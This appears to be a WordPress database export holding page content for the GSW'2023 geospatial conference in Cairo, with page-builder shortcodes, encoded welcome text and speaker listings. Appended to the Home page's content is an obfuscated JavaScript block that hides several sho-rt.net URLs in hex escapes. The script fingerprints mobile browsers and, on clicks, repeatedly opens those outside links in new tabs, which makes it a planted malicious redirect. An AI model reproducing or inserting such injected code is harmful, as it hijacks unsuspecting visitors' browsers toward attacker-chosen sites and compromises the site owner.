2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','publish','closed','closed','','home-2','','','2023-06-25 15:40:37','2023-06-25 15:40:37','',0,'https://gsw2023.com/?page_id=3063',1,'page','',0),
(3064,1,'2022-11-08 21:14:13','2022-11-08 21:14:13','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" 